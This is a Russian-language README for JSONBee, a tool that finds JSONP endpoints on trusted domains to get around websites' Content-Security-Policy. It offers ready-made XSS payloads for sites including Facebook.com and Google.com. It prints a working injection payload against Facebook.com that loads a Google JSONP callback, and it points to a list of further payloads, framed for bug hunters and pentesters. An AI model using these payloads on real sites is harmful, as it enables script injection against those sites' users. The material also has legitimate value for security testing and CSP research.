
Готовые к использованию JSONP-конечные точки/полезные нагрузки для обхода политики безопасности контента (CSP) различных веб-сайтов.
Готовые к использованию JSONP-эндпоинты для обхода политики безопасности контента (CSP) различных веб-сайтов.
Инструмент был представлен на HackIT 2018 в Киеве. Презентацию можно найти здесь (не уверен, почему формат слайдов испорчен :D): https://www.slideshare.net/Hacken_Ecosystem/ebrahem-hegazy-bug-hunters-manual-for-bypassing-contentsecuritypolicy
Основная идея этого инструмента — автоматически находить JSONP-эндпоинты, которые помогут обойти политику безопасности контента для вашего целевого веб-сайта. JSONBee принимает на вход имя URL (например, https://www.facebook.com), анализирует CSP (Content-Security-Policy) и автоматически предлагает XSS-пейлоад, который обойдет CSP. В основном он сосредоточен на JSONP-эндпоинтах, собранных в ходе моей охоты за баг-баунти, и может использоваться для обхода CSP.
JSONBee полагается на 3 метода для сбора JSONP-эндпоинтов:
Инструмент ещё не полностью завершён, так как я всё ещё добавляю некоторые проверки и функции. Однако репозиторий будет размещён здесь, чтобы любой мог им пользоваться, пока инструмент не будет готов.
Репозиторий содержит готовые к использованию пейлоады, которые могут обойти CSP для Facebook.com, Google.com и других сайтов.
Обход Content-Security Policy Facebook.com:
Facebook.com разрешает *.google.com в своей политике CSP (директива script-src), поэтому следующий пейлоад отлично сработает для выполнения JavaScript на Facebook.com:
"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
Если вы столкнулись с веб-сайтом, который доверяет любому из доменов из файла jsonp.txt в своей директиве script-src, то выберите пейлоад, соответствующий этому домену, и получайте удовольствие :)
Все желающие могут внести свой вклад, добавляя ссылки на сайты, использующие JSONP-эндпоинты/обратные вызовы, чтобы сделать репозиторий больше и полезнее для охотников за багами, пентестеров и исследователей безопасности.